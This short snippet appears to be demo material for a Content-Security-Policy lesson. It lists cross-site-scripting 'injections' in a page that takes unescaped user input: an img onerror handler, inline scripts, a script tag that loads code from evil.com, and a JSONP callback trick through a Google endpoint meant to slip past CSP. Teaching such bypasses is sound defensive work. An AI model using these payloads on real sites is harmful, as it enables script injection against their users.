Imagine the list is populate by user input and no sanitization or output escaping. Code block are the "injections".
Content-Security-Policy: script-src 'self' 'sha256-z3MGfz90JNhIhwtX4cVwlPL68VW5e8s76qSDIcfLtY4=';
<img src="cat.png" onerror="console.log('Malicious inline code executing ...')" >
<script>
 console.log("Malicious script block executing ...");
 setTimeout(() => {
 document.querySelector('h1').textContent = 'Cats are better';
 document.querySelectorAll('img').forEach(i => i.src = i.src.replace('https://place-puppy.com', 'https://placekitten.com').replace('x', '/'));
 }, 1000);
</script>
<script src="https://evil.com/evil.js"></script>
<script src="https://apis.google.com/complete/search?client=chrome&q=<script>alert('arbitrary xss')</script>&callback=document.write"></script>
<script>
 const numberOfDogs = document.querySelectorAll('li').length;
 document.getElementById("counter")
 .addEventListener("click", () => alert(`There are ${numberOfDogs} dogs in the list.`));
</script>